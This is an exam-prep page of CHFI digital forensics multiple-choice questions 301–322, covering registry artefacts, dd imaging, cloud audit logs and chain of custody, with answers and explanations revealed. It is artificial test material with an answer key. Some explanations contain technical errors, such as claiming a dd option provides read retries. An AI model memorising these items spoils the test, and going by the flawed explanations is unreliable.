Courseiva

Computer Hacking Forensic Investigator CHFI (CHFI) — Questions 301–375

745 questions total · 10pages · All types, answers revealed

Page 4

Page 5 of 10

Page 6
301
MCQmedium

In a corporate investigation, legal counsel issues a litigation hold to preserve electronically stored information (ESI) relevant to a lawsuit. Which of the following is the BEST description of a litigation hold?

A.A form of encryption used to protect evidence during transport.
B.A notice to employees to preserve all relevant ESI and cease routine deletion.
C.A technique used to acquire forensic images without altering the source.
D.A court order authorizing law enforcement to seize computers.
AnswerB

A litigation hold is an official notice, typically issued by legal counsel, directing employees and other custodians to suspend normal deletion and retention schedules so that all potentially relevant electronically stored information (ESI) is preserved. Once litigation is reasonably anticipated, the duty attaches, and failure to implement the hold can lead to spoliation sanctions. The notice must be specific enough for custodians to understand what to keep and how to preserve it.

Why this answer

A litigation hold is a legal notice issued to employees and data custodians instructing them to preserve all relevant electronically stored information (ESI) and to suspend any routine deletion, archiving, or destruction policies. This ensures that potentially discoverable data remains intact and unaltered for the duration of the legal proceeding, directly supporting the duty to preserve evidence under the Federal Rules of Civil Procedure (FRCP Rule 37(e)).

Exam trap

The trap here is that candidates confuse a litigation hold with a technical preservation method (like write-blocking or encryption) or with a court order, when in fact it is a legal notice to employees to stop routine deletion of ESI.

How to eliminate wrong answers

Option A is wrong because encryption is a security measure for protecting data confidentiality during transport or storage, not a legal preservation directive; a litigation hold has nothing to do with cryptographic algorithms like AES or RSA. Option C is wrong because it describes a forensic acquisition technique (e.g., using a write blocker or dd command to create a bit-for-bit copy), which is a technical procedure, not a legal notice or hold. Option D is wrong because a court order authorizing seizure is a search warrant or seizure order, typically issued under probable cause, whereas a litigation hold is a civil preservation notice issued by legal counsel without requiring judicial approval.

302
MCQeasy

What is the primary goal of computer forensics?

A.To prevent future cyber attacks
B.To identify and prosecute cybercriminals
C.To preserve and analyze digital evidence in a legally admissible manner
D.To recover deleted files from a hard drive
AnswerC

The primary goal is to apply a structured, legally defensible process that identifies, collects, preserves, examines and analyzes digital evidence while maintaining a provable chain of custody and verifying data integrity through techniques such as hashing and write-blocking. The ultimate objective is admissibility and reliability in a legal or administrative proceeding, not merely extracting data from a device. Every action, from seizure to reporting, must withstand scrutiny about how evidence was acquired and handled.

Why this answer

The primary goal of computer forensics is to preserve and analyze digital evidence in a manner that is legally admissible in court.

303
MCQmedium

In Windows registry forensics, which key is examined to identify USB devices that were connected to the system?

A.HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
B.NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2
C.HKLM\SAM\SAM\Domains\Account\Users
D.HKLM\SYSTEM\CurrentControlSet\Enum\USBSTOR
AnswerD

The HKLM\SYSTEM\CurrentControlSet\Enum\USBSTOR key is the definitive registry artifact for identifying USB mass storage devices that have been connected to a Windows system. Under this key, the Plug and Play manager creates a subtree in which each vendor/product pair (e.g., Disk&Ven_Kingston&Prod_DataTraveler&Rev_1.00) appears, and beneath that, a unique device instance key named with the device's reported serial number. Forensic examiners can extract the device instance's LastWrite time and the FriendlyName value to confirm both the exact drive and its approximate last connection time. Because the system records this information even after the device is removed, it is the correct key to examine in registry-based USB forensic investigations.

Why this answer

The USBSTOR key under HKLM\SYSTEM\CurrentControlSet\Enum contains a subkey for each USB mass storage device that has ever been connected to the system, recording the device's serial number, class, and instance ID. This is the primary forensic artifact for identifying USB device connection history because the system enumerates and persists these entries when a USB storage device is first plugged in.

Exam trap

EC-Council often tests the distinction between the hardware enumeration key (USBSTOR) and the user-specific mount point key (MountPoints2), leading candidates to choose the latter because it appears more directly related to 'connected devices' in the registry path.

How to eliminate wrong answers

Option A is wrong because HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run stores startup programs, not USB device connection history. Option B is wrong because NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 stores user-specific mount point mappings and drive letter assignments, but it does not contain the definitive hardware enumeration data for USB devices; it is a secondary artifact that can be deleted or altered by user activity. Option C is wrong because HKLM\SAM\SAM\Domains\Account\Users stores local user account security identifiers (SIDs) and password hashes, not USB device information.

304
MCQhard

During a forensic examination, an analyst runs the following command: 'dd if=/dev/sda of=/mnt/evidence/image.dd bs=4k conv=noerror,sync'. The source drive has bad sectors. What is the effect of the 'conv=noerror,sync' option?

A.It stops the imaging process when an error is encountered.
B.It skips the bad sectors and compresses the output.
C.It retries reading the bad sector multiple times before giving up.
D.It fills the bad sectors with zeros in the output image, allowing the imaging to complete without errors.
AnswerD

With `conv=noerror,sync`, `dd` treats any read error as a non-fatal event and continues copying the remainder of the source device, but it also pads the failed block with zeros so that the output image is the exact same size as the original media. This means the image contains placeholders for the unreadable sectors, preserving partition offsets and file system layout. It does not recover the original data in those sectors, but it lets the imaging finish and produces a valid forensic image.

Why this answer

The 'conv=noerror,sync' option in dd instructs the tool to continue reading even when encountering read errors (noerror) and to pad the output with zeros (sync) to maintain the original block size alignment. This ensures the forensic image is a complete bit-for-bit copy of the source drive, with bad sectors replaced by zeros, allowing the imaging process to finish without halting on errors.

Exam trap

The trap here is that candidates confuse 'sync' with 'synchronization' or 'skip' rather than understanding it as a padding mechanism that fills bad sectors with zeros to maintain block alignment and allow the imaging to complete.

How to eliminate wrong answers

Option A is wrong because 'conv=noerror' explicitly tells dd to NOT stop on errors; it continues processing. Option B is wrong because dd does not compress output; compression requires a separate tool or pipe (e.g., gzip), and 'sync' pads with zeros, not skips. Option C is wrong because dd does not retry reads; it simply moves to the next block after an error, and retry behavior would require additional options like 'conv=noerror,notrunc' or a separate script.

305
MCQeasy

Which of the following is a key difference between static analysis and dynamic analysis in malware forensics?

A.Static analysis requires the malware to be executed, while dynamic analysis does not.
B.Static analysis is used only for packed malware, while dynamic analysis is used for unpacked.
C.Dynamic analysis uses tools like IDA Pro, while static uses Cuckoo Sandbox.
D.Static analyzes the code without execution; dynamic executes the malware.
AnswerD

This is the core distinction: static analysis inspects the binary's code, structure, strings, and imports without ever running the file, whereas dynamic analysis executes the malware in a controlled, monitored environment to observe its behavior, such as file modifications, registry changes, and network connections. The two approaches are complementary, with static shedding light on intent and dynamic revealing actual side effects.

Why this answer

Static analysis involves examining the malware's code (e.g., disassembly, string extraction, hash analysis) without executing it, while dynamic analysis runs the malware in a controlled sandbox environment to observe its runtime behavior, such as file system changes, registry modifications, and network connections. This fundamental distinction is critical in malware forensics to safely understand the threat without risking infection.

Exam trap

EC-Council often tests the reversal of definitions (execution vs. non-execution) to catch candidates who confuse static and dynamic analysis roles.

How to eliminate wrong answers

Option A is wrong because it reverses the definitions: static analysis does NOT require execution, while dynamic analysis does. Option B is wrong because static analysis can be applied to both packed and unpacked malware (though packing complicates static analysis), and dynamic analysis works regardless of packing by observing runtime behavior. Option C is wrong because IDA Pro is a static analysis tool (disassembler/decompiler), while Cuckoo Sandbox is a dynamic analysis tool (automated malware execution environment); the option swaps their correct classifications.

306
MCQmedium

During a cloud forensics investigation of an AWS environment, an analyst extracts CloudTrail logs and notices many events with the error code 'AccessDenied' for a specific IAM user attempting to list an S3 bucket. Which of the following is the most appropriate next step?

A.Review the IAM policies attached to the user to determine if the action was authorized
B.Immediately disable the IAM user account
C.Escalate the issue to law enforcement
D.Check the S3 bucket's access logs for the same IP address
AnswerA

In an AWS environment, CloudTrail's AccessDenied record indicates the request was evaluated and explicitly rejected by IAM, but it does not reveal why. Reviewing the IAM policies attached to the user — including group and any applicable SCPs — determines whether the action was within authorized scope or whether a policy misconfiguration caused the denial. This also provides context for the user's intent, distinguishing a legitimate attempt from a potential unauthorized access probe, making it the correct first forensic step.

Why this answer

AccessDenied indicates the user lacks permissions; check IAM policies to see if the user should have access or if it's an unauthorized attempt.

307
MCQmedium

An analyst finds evidence that an attacker used steganography to hide data within image files on the suspect's computer. Which of the following tools is MOST appropriate for detecting steganography in these images?

A.Foremost
B.Autopsy
C.Stegdetect
D.Volatility
AnswerC

Stegdetect is a specialized static analysis tool that scans image files for signatures of common steganographic algorithms such as jsteg, outguess, and F5. It performs statistical tests and histogram analysis on JPEG coefficients to identify embedded payloads, making it the most direct and purpose-built choice for confirming steganographic content in a suspected image.

Why this answer

Stegdetect is specifically designed to detect steganographic content in images by analyzing statistical anomalies in pixel data, such as those introduced by LSB (Least Significant Bit) embedding. It can identify common steganography tools like JSteg, JPHide, and OutGuess, making it the most appropriate choice for this scenario.

Exam trap

EC-Council often tests the distinction between file recovery tools (like Foremost) and steganography detection tools, leading candidates to mistakenly choose Foremost because it is associated with 'hidden' data recovery.

How to eliminate wrong answers

Option A is wrong because Foremost is a file carving tool used to recover deleted files based on headers and footers, not for detecting hidden data within intact image files. Option B is wrong because Autopsy is a digital forensics platform that provides a GUI for analyzing disk images and file systems, but it does not include built-in steganography detection capabilities. Option D is wrong because Volatility is a memory forensics framework for analyzing RAM dumps, such as processes and network connections, and is not used for static file analysis or steganography detection.

308
MCQmedium

In an Azure environment, a forensic analyst needs to identify which user assigned a specific role to another user, leading to privilege escalation. Which Azure log should the analyst examine?

A.Azure AD Sign-In Logs
B.Azure Activity Log
C.Azure Diagnostic Logs
D.Azure Network Watcher Logs
AnswerB

The Azure Activity Log is the subscription's control-plane audit trail for all Azure Resource Manager operations, generated whenever a resource is created, modified, or deleted. It captures authorization operations under 'Microsoft.Authorization', such as roleAssignments/write, roleAssignments/delete, or roleDefinitions/write, recording the caller (user, application, or service principal), the exact scope, the action, and the timestamp. Querying these events is the definitive forensic way to determine which principal obtained or lost a specific RBAC role, whether at the management group, subscription, resource group, or resource scope.

Why this answer

Azure Activity Log (now part of Azure Monitor) records all control-plane operations, including role assignments and privilege escalations. When a user assigns a role to another user, that action is logged as a 'Microsoft.Authorization/roleAssignments/write' event in the Activity Log, which captures the caller's identity (UPN or Object ID), the target user, and the role assigned. This makes it the definitive source for identifying who performed the role assignment.

Exam trap

EC-CHFI often tests the distinction between authentication logs (Sign-In Logs) and authorization logs (Activity Logs), so the trap here is that candidates mistakenly choose Azure AD Sign-In Logs because they associate 'user' and 'role' with identity, not realizing that role assignments are control-plane operations logged in the Activity Log.

How to eliminate wrong answers

Option A is wrong because Azure AD Sign-In Logs track authentication events (successful/failed logins, MFA challenges, and sign-in risks), not authorization changes like role assignments. Option C is wrong because Azure Diagnostic Logs are resource-level logs (e.g., from VMs, app services, or databases) that capture internal application or OS events, not Azure RBAC operations. Option D is wrong because Azure Network Watcher Logs capture network traffic analytics, flow logs, and connectivity issues, not identity or role management activities.

309
MCQhard

During a cloud forensic investigation, the analyst discovers that the suspect used AWS IAM credentials to launch unauthorized EC2 instances. The suspect claims the credentials were stolen. Which log would the analyst examine to determine the source IP address from which the credentials were used?

A.VPC Flow Logs
B.Amazon Inspector findings
C.AWS Config
D.AWS CloudTrail
AnswerD

AWS CloudTrail is the authoritative service for API activity logging in AWS, recording every management event (and optionally data events) as a CloudTrail log file. Each event includes the user identity (IAM user, role, or federated principal), source IP address, user agent, AWS region, event name, request parameters, and response elements. This enables a forensic analyst to trace exactly which API call was made, by whom, and from which IP address, making it the correct source for determining API call origin during an investigation.

Why this answer

AWS CloudTrail records all API calls made to the AWS environment, including the `RunInstances` action that launches EC2 instances. Each CloudTrail event contains the `sourceIPAddress` field, which captures the IP address from which the IAM credentials were used. This makes CloudTrail the definitive log to identify the origin of the unauthorized activity.

Exam trap

EC-Council CHFI exams often test the distinction between network-level logs (VPC Flow Logs) and API-level logs (CloudTrail), leading candidates to mistakenly choose VPC Flow Logs because they associate 'source IP' with network traffic rather than API call metadata.

How to eliminate wrong answers

Option A is wrong because VPC Flow Logs capture network traffic at the IP/port level (e.g., packets between EC2 instances and external hosts), not the API-level authentication events that record which IAM credentials were used or the source IP of the credential usage. Option B is wrong because Amazon Inspector is a vulnerability assessment service that scans for software vulnerabilities and network exposure, not a logging service for API calls or credential usage. Option C is wrong because AWS Config tracks resource configuration changes and compliance over time (e.g., whether an EC2 instance has a specific tag), but it does not log the source IP address of the API call that created the resource.

310
MCQmedium

A forensic analyst discovers an unusual entry in the Windows Registry under 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run'. Which persistence mechanism does this represent?

A.Registry Run key persistence
B.Service installation
C.Scheduled task
D.Startup folder
AnswerA

The Run key is a Windows AutoStart Extensibility Point (ASEP) located in both HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run and HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run, causing the referenced executable to launch each time a user logs on. An unusual entry here, often a command line pointing to a portable executable in a temp directory, is a classic persistence mechanism used by malware. Because the Run key is queried at logon and is a single value, it is one of the simplest and most frequently abused persistences in Windows, and its presence is a strong indicator of compromise when the entry is not associated with a legitimate installed program.

Why this answer

The registry key 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run' is a standard Windows Registry Run key that automatically launches specified programs when a user logs in. This is a well-known persistence mechanism used by both legitimate software and malware to maintain foothold on a system. The presence of an unusual entry here indicates an attempt to achieve persistence via the registry.

Exam trap

EC-Council CHFI often tests the distinction between user-specific (HKCU) and system-wide (HKLM) Run keys, and candidates may confuse the Run key with other persistence mechanisms like scheduled tasks or services, but the key path explicitly identifies it as a Registry Run key.

How to eliminate wrong answers

Option B is wrong because service installation uses the Service Control Manager (SCM) and registry keys under 'HKLM\System\CurrentControlSet\Services' or 'HKCU\System\CurrentControlSet\Services', not the 'Run' key. Option C is wrong because scheduled tasks are configured via the Task Scheduler (stored in %SystemRoot%\Tasks or the Task Scheduler XML files), not through the 'Run' registry key. Option D is wrong because the Startup folder is a physical folder located at '%AppData%\Microsoft\Windows\Start Menu\Programs\Startup' (or the All Users variant), not a registry key.

311
MCQeasy

What is the primary purpose of maintaining a chain of custody during a forensic investigation?

A.To document the handling of evidence from collection to presentation in court
B.To reduce the size of evidence for easier storage
C.To analyze the evidence for hidden data
D.To encrypt the evidence to prevent unauthorized access
AnswerA

The chain of custody is a legal and administrative record that creates an unbroken chronological log of every individual who collected, handled, transferred, or stored a piece of evidence. This documentation is critical because it demonstrates that the evidence has not been altered, substituted, or contaminated, thereby establishing the authenticity and integrity required for the evidence to be admissible in a court of law. Without a proper chain of custody, the opposing counsel can challenge the evidence's reliability, potentially leading to its exclusion.

Why this answer

The primary purpose of maintaining a chain of custody is to create a documented, unbroken record of every person who handled the evidence, from the moment it is collected until it is presented in court. This documentation is critical to establish the authenticity and integrity of the evidence, ensuring it has not been tampered with or altered, which is a foundational requirement for admissibility under legal standards like the Federal Rules of Evidence (FRE) 901. Without a proper chain of custody, the evidence can be challenged as inadmissible due to lack of trustworthiness.

Exam trap

EC-Council often tests the distinction between the chain of custody's documentation purpose and other forensic activities like analysis or security, so candidates mistakenly choose options that describe evidence handling steps (e.g., encryption or analysis) rather than the core legal documentation requirement.

How to eliminate wrong answers

Option B is wrong because reducing the size of evidence for easier storage is not a forensic goal; it would actually destroy or compress data, potentially losing critical metadata and violating the principle of maintaining evidence in its original state. Option C is wrong because analyzing evidence for hidden data is a separate investigative step (e.g., using tools like FTK or EnCase for steganography detection), not the purpose of the chain of custody, which is purely about documenting handling. Option D is wrong because encrypting evidence to prevent unauthorized access is a security measure, not a documentation process; encryption can even complicate chain of custody if the key is not properly managed, and the chain of custody itself does not involve cryptographic operations.

312
MCQeasy

Which tool is commonly used to analyze email headers and trace the path of an email across servers by parsing 'Received' fields?

A.EmailTrackerPro
B.Wireshark
C.Volatility
D.FTK Imager
AnswerA

EmailTrackerPro is a dedicated email header analysis utility that parses the full raw header block of an email message, extracting the complete delivery path as recorded in each 'Received' field. It maps the route taken from the original sender through each intermediary Mail Transfer Agent (MTA), resolving and visualizing IP addresses, timestamps, and server hostnames. This makes it the appropriate tool for tracing email provenance and identifying the actual sending relay in phishing or spam investigations.

Why this answer

EmailTrackerPro is specifically designed to analyze email headers and trace the path of an email.

313
MCQeasy

An Android phone is seized, and the forensic examiner needs to acquire the device in a forensically sound manner. The phone is running Android 12 and has USB debugging enabled. Which acquisition method provides the most complete data without physically modifying the device?

A.File system acquisition via Cellebrite UFED
B.Physical acquisition via ADB with appropriate exploit
C.Logical acquisition through ADB backup
D.Manual extraction using screen captures
AnswerB

Physical acquisition via ADB leverages a custom recovery or a privilege-escalation exploit to execute a low-level block device read, such as dd if=/dev/block/mmcblk0 of=/image.dd, yielding a complete bit-for-bit replica of the flash storage. This preserves deleted files, unallocated clusters, file system slack, and application remnants that are absent from logical or file-system extractions, making it the most comprehensive and forensically defensible approach for Android devices when feasible.

Why this answer

Physical acquisition via ADB with an appropriate exploit allows the examiner to obtain a complete bit-for-bit copy of the device's flash memory, including deleted data and unallocated space, without physically modifying the device. Since Android 12 has USB debugging enabled, ADB can be used to push an exploit that bypasses security restrictions to perform a physical dump, which is the most comprehensive method available for this scenario.

Exam trap

EC-Council often tests the misconception that file system acquisition via Cellebrite UFED is the most complete method, but candidates must remember that physical acquisition captures raw flash memory including deleted data, whereas file system acquisition only retrieves active files.

How to eliminate wrong answers

Option A is wrong because Cellebrite UFED file system acquisition typically extracts only the file system structure (files and directories) and does not capture raw flash memory or unallocated space, missing deleted data and hidden partitions. Option C is wrong because logical acquisition through ADB backup only retrieves app data and system settings specified by the backup API, not the entire device storage, and it cannot recover deleted files or raw disk images. Option D is wrong because manual extraction using screen captures is not a forensic acquisition method; it only captures visible screen content and provides no access to underlying data, making it forensically unsound and incomplete.

314
Multi-Selecthard

A GCP audit log shows a project owner granted 'iam.serviceAccountUser' role to a service account from a different project. Which TWO potential security implications should the investigator prioritize?

Select 2 answers
A.The service account can be used to escalate privileges by attaching it to resources
B.The audit logging is now disabled for that service account
C.The service account's keys are automatically rotated
D.Cross-project access may allow lateral movement
E.The service account can now impersonate any user in the project
AnswersA, D

The iam.serviceAccountUser role permits a principal to attach that service account to Compute Engine instances or other resources, inheriting its permissions. Granting it cross-project lets the grantee impersonate the service account and thereby escalate beyond their own project's rights.

Why this answer

Option A is correct because the iam.serviceAccountUser role grants the ability to attach a service account to a resource (for example, deploying a Compute Engine instance or Cloud Function that runs as that service account), which can let a principal act with the service account's permissions and escalate privileges. Option D is correct because granting this role to a service account from a different project creates a cross-project trust path, enabling lateral movement from the attacker's project into the target project's resources. Option B is wrong because granting iam.serviceAccountUser does not disable or modify audit logging.

Option C is wrong because key rotation is not triggered by this role grant and is unrelated to it. Option E is wrong because iam.serviceAccountUser does not grant user impersonation; that requires roles/iam.serviceAccountTokenCreator or the iam.serviceAccounts.getAccessToken permission.

Exam trap

The distinction between 'iam.serviceAccountUser' (which allows using the service account on resources) and 'iam.serviceAccountTokenCreator' (which allows impersonation and token generation) is often tested, leading candidates to mistakenly think the role enables user impersonation.

315
MCQmedium

A forensic analyst is testifying as an expert witness in court. The opposing counsel challenges the analyst's testimony based on the Frye standard. What does the Frye standard require for scientific evidence to be admissible?

A.The evidence must have been obtained with a warrant.
B.The evidence must be relevant and more probative than prejudicial.
C.The evidence must have been peer-reviewed and published.
D.The evidence must be based on techniques generally accepted in the scientific community.
AnswerD

Under the Frye standard, scientific evidence is admissible only when the methodology or technique on which it is based has achieved general acceptance within the relevant scientific community. This standard, established in Frye v. United States, does not require universal agreement but rather substantial consensus among experts in the applicable field. It is a threshold test for the admissibility of novel scientific evidence, separate from rules about relevance, prejudice, or constitutional procedure.

Why this answer

The Frye standard requires that scientific evidence be based on principles and methods that are generally accepted by the relevant scientific community.

316
MCQhard

An analyst retrieves a forensic image of a hard drive and discovers that the size reported by the operating system is smaller than the actual physical capacity. The extra space is not accessible through standard partition tools. This hidden area is MOST likely:

A.Device Configuration Overlay
B.Host Protected Area
C.Volume slack
D.RAM slack
AnswerB

Host Protected Area (HPA) is the correct answer because it is a hidden region created using the ATA Set Max Address command, which makes the operating system see a smaller disk than the physical platter actually contains. This area cannot be accessed through normal OS commands and is frequently used to conceal data for forensic analysis or other purposes. When an analyst observes that the OS-reported capacity is less than the physical drive size, the HPA is exactly the hidden area responsible for that discrepancy.

Why this answer

The Host Protected Area (HPA) is a region on a hard drive that is hidden from the operating system by using the ATA SET MAX ADDRESS command to reduce the reported capacity. This area is not accessible through standard partition tools because the OS sees only the reduced address space, making it ideal for storing forensic or diagnostic data. The analyst's observation of a smaller reported size than physical capacity directly matches HPA behavior.

Exam trap

EC-Council often tests the distinction between HPA and DCO, where candidates confuse the ATA commands (SET MAX ADDRESS vs. DEVICE CONFIGURATION) and incorrectly assume DCO is the primary hidden area when the symptom is a reduced OS-reported size.

How to eliminate wrong answers

Option A is wrong because a Device Configuration Overlay (DCO) is a separate hidden area created by the ATA DEVICE CONFIGURATION command that can be removed to reveal additional space, but it does not reduce the OS-reported size below physical capacity via a simple address limit like HPA. Option C is wrong because volume slack refers to unused space at the end of a partition that is still within the partition's logical boundaries and accessible via partition tools, not a hidden area beyond the OS-reported capacity. Option D is wrong because RAM slack is the unused space in the last sector of a file's allocated clusters that is filled with RAM contents, which is a file system concept unrelated to hard drive hidden areas.

317
MCQmedium

A forensic analyst is examining an Android device that was factory reset before seizure. Which Google account artefacts are MOST likely still recoverable from the device's storage?

A.All installed application APK files
B.Full SMS message history
C.Google account authentication tokens and cached account data
D.Encryption keys for user data partition
AnswerC

Google account authentication tokens and cached account data are written by the AccountManager service to /data/system/users/0/accounts.db and an encrypted credential store; after a factory reset, the /data partition is formatted but the underlying NAND blocks are not necessarily zeroized, allowing forensic recovery of deleted SQLite pages and token blobs. On many Android builds, the primary Google account username and its OAuth token are also cached in the Google Services Framework and can survive in unallocated space or even in a persistent FRP/device-protection partition. This combination of flash-memory remnants plus a designated persistent location makes account tokens the artifact most likely to be recovered after a reset compared to APKs, SMS, or encryption keys.

Why this answer

Factory reset on Android typically wipes user data partitions (e.g., /data) but does not securely overwrite the entire flash storage. Google account authentication tokens (e.g., OAuth 2.0 tokens) and cached account data (e.g., account names, sync settings) are often stored in system-level databases or encrypted key stores that may persist in unallocated or residual flash blocks, especially if TRIM or secure erase was not executed. These artefacts can be recovered via forensic imaging and carving of the raw NAND or eMMC.

Exam trap

EC-Council often tests the misconception that a factory reset securely erases all user data, when in reality residual artefacts like authentication tokens can persist in unallocated flash storage due to incomplete overwrite or lack of TRIM execution.

How to eliminate wrong answers

Option A is wrong because APK files are stored in the /data/app directory, which is part of the user data partition that is wiped during a factory reset; residual APK fragments are rarely recoverable in a complete, installable form. Option B is wrong because SMS messages are stored in the /data/data/com.android.providers.telephony/databases/mmssms.db file, which is also on the user data partition and is deleted during reset; while some fragments may remain in unallocated space, full message history is not reliably recoverable. Option D is wrong because encryption keys for the user data partition (e.g., FBE or FDE keys) are stored in the device's hardware-backed keystore or TEE and are cryptographically invalidated or wiped during factory reset, making them unrecoverable.

318
MCQeasy

Which of the following BEST describes the chain of custody in digital forensics?

A.The software tool used to image the hard drive.
B.A log of all personnel who have accessed the evidence, along with timestamps and reasons.
C.The process of encrypting evidence to prevent unauthorized access.
D.The physical lock and key used to secure the evidence locker.
AnswerB

This is exactly the chain of custody: a formal record that establishes the identity of every individual who handled the evidence, the duration of possession, and the purpose. It ensures that the evidence can be accounted for at every stage, preventing tampering or unauthorized alteration. This documentation is critical to prove that the evidence presented in court is the same as that originally collected.

Why this answer

The chain of custody is a documented chronological record that tracks the seizure, custody, control, transfer, analysis, and disposition of digital evidence. It must include every person who handled the evidence, the date and time it was accessed, the purpose of access, and any changes made, ensuring the evidence's integrity and admissibility in court under rules like Federal Rule of Evidence 901.

Exam trap

The CHFI exam often tests the misconception that chain of custody is about physical security (like locks or encryption) rather than the documented audit trail of personnel access, leading candidates to pick options C or D.

How to eliminate wrong answers

Option A is wrong because the software tool used to image the hard drive (e.g., FTK Imager, dd) is a forensic acquisition tool, not a record of evidence handling; the chain of custody is a procedural log, not a tool. Option C is wrong because encrypting evidence (e.g., using BitLocker or VeraCrypt) is a security measure to protect confidentiality, but it does not document who accessed the evidence or when; encryption alone cannot prove integrity or custody history. Option D is wrong because the physical lock and key securing the evidence locker is a physical access control mechanism, not a documented log of personnel access with timestamps and reasons; chain of custody requires a written or electronic audit trail, not just physical security.

319
MCQmedium

A security analyst suspects malware infection on a Windows workstation. They run Process Monitor and observe that a process named 'svch0st.exe' creates a mutex named 'Global\Mutex_1234' and writes to the registry key 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run'. Which malware persistence mechanism is being used?

A.Scheduled task creation
B.Service installation
C.DLL search order hijacking
D.Run key persistence
AnswerD

Run key persistence is an established autostart extensibility point where malware creates a value in the HKCU or HKLM Run key so that the associated program executes automatically at user logon. Both HKCU\Software\Microsoft\Windows\CurrentVersion\Run and HKLM\Software\Microsoft\Windows\CurrentVersion\Run are commonly monitored, but malware often abuses them because they are simple and reliable, often without requiring elevated privileges for the HKCU variant. From an analyst's perspective, finding an unexpected value in these keys is a strong indicator of persistence, and the command or path of the value can be used for further triage.

Why this answer

The process 'svch0st.exe' writes to the registry key 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run', which is a classic Run key used for automatic program execution at user logon. This is the most common malware persistence mechanism, as any executable referenced there will start each time the user logs in. The creation of a mutex named 'Global\Mutex_1234' is a common anti-reinfection technique to ensure only one instance of the malware runs, but the persistence is established via the Run key.

Exam trap

EC-Council often tests the distinction between user-level persistence (HKCU Run key) and system-level persistence (HKLM Run key or service installation), and candidates may confuse the 'Run' key with scheduled tasks or services because all three can launch executables at startup.

How to eliminate wrong answers

Option A is wrong because scheduled task creation uses the Task Scheduler service and writes to the '\Windows\System32\Tasks' directory or the 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache' registry key, not to the 'Run' key. Option B is wrong because service installation requires writing to 'HKLM\SYSTEM\CurrentControlSet\Services' and typically uses the 'CreateService' API, not the 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run' key. Option C is wrong because DLL search order hijacking involves placing a malicious DLL in a directory searched before the legitimate DLL (e.g., the application's directory or the current working directory) and does not involve writing to a Run registry key or creating a mutex.

320
MCQmedium

A malware analyst runs a suspicious executable in Cuckoo Sandbox. The report shows that the process created a mutex named 'Global\MyMalwareMutex'. What is the significance of this mutex?

A.It is used to communicate with a remote command and control server
B.It prevents multiple instances of the malware from running simultaneously
C.It indicates the malware is packed with UPX
D.It stores encrypted configuration data
AnswerB

This is the correct interpretation: when a process creates a named mutex and then checks for its existence before proceeding, it is using the object as a global, system-wide flag. If the mutex already exists, the malware terminates itself or exits its main thread, ensuring that only one copy of the malware is active at any time. Analysts see this in Cuckoo sandbox when the sample creates a uniquely named mutex and later attempts to open the same mutex again; this behavior prevents duplicate infections, avoids file-corruption conflicts, and preserves the integrity of the malware's own state.

Why this answer

The mutex named 'Global\MyMalwareMutex' is a named synchronization object used by the malware to ensure only one instance of its process runs at a time. This prevents conflicts in operations like file writing or network communication that could occur if multiple copies executed simultaneously. In Cuckoo Sandbox, detecting such a mutex is a common indicator of single-instance malware behavior.

Exam trap

EC-Council often tests the misconception that any named object with 'Global' implies network or cross-system communication, but in Windows, 'Global\' simply refers to the kernel object namespace accessible to all sessions on the same machine.

How to eliminate wrong answers

Option A is wrong because mutexes are local synchronization primitives within the Windows kernel, not network communication channels; C2 communication typically uses sockets, HTTP, or DNS. Option C is wrong because UPX packing is detected by analyzing the executable's section names (e.g., 'UPX0', 'UPX1') or entropy, not by mutex creation. Option D is wrong because mutexes do not store data; they are kernel objects with a name and state (signaled/non-signaled), whereas encrypted configuration is usually stored in files, registry keys, or memory.

321
MCQmedium

During a forensic examination, an analyst uses Autopsy to view the contents of the Recycle Bin on a Windows 10 system. However, some files that were deleted by the user do not appear in the Recycle Bin. What is the MOST likely reason?

A.The Recycle Bin stores only files smaller than 1 GB
B.The files were encrypted
C.The files were deleted using Shift+Delete
D.The Recycle Bin was emptied
AnswerC

Holding Shift while pressing Delete (or selecting 'permanently delete') instructs the NTFS driver to unlink the file immediately without creating the $I metadata and $R data entries in the $Recycle.Bin folder. This bypasses the normal two-step Recycle Bin process, marking the clusters as free and removing the directory entry, so the file never appears in the Recycle Bin. In forensic practice, this is the classic explanation for why deleted files cannot be located in the Recycle Bin.

Why this answer

When a user deletes a file using Shift+Delete, the file bypasses the Recycle Bin entirely and is permanently removed from the file system. Autopsy, as a forensic tool, reads the Recycle Bin’s metadata (e.g., the $I and $R files) to list its contents, so files deleted with Shift+Delete will not appear there because they were never placed in the Recycle Bin.

Exam trap

The trap here is that candidates often assume the Recycle Bin stores all deleted files, but the EC-Council CHFI exam tests the specific behavior that Shift+Delete bypasses the Recycle Bin entirely, and that emptying the Recycle Bin removes the files from view but does not explain their absence if they were never placed there.

How to eliminate wrong answers

Option A is wrong because the Recycle Bin does not have a fixed size limit of 1 GB; it can store files of any size up to the configured maximum size (typically 10% of the drive), and files larger than that threshold are handled by prompting the user to permanently delete them. Option B is wrong because encryption does not affect whether a file is sent to the Recycle Bin; encrypted files are still moved to the Recycle Bin when deleted normally, and the Recycle Bin stores the encrypted data as-is. Option D is wrong because if the Recycle Bin had been emptied, the $I and $R files would still exist in the Recycle Bin folder until overwritten, and Autopsy could potentially recover them; the question states the files 'do not appear,' implying they were never placed there, not that they were removed after being placed.

322
MCQmedium

During incident response, a first responder discovers a compromised system with signs of an active command-and-control (C2) connection. What is the MOST important immediate action to preserve evidence and prevent further damage?

A.Create a full disk image before taking any other action.
B.Disconnect the network cable to isolate the system from the network.
C.Immediately shut down the system to prevent further data exfiltration.
D.Run a full antivirus scan to remove the malware.
AnswerB

Physically unplugging the network cable is the correct immediate action because it provides an OS-independent isolation that halts command-and-control channels and prevents remote tampering without initiating any shutdown routines. This preserves critical volatile evidence such as active TCP/UDP connections, ARP cache entries, running processes, and memory contents, enabling a later live forensic acquisition. It also stabilizes the host so that subsequent imaging and analysis can be performed in a controlled, defensible manner.

Why this answer

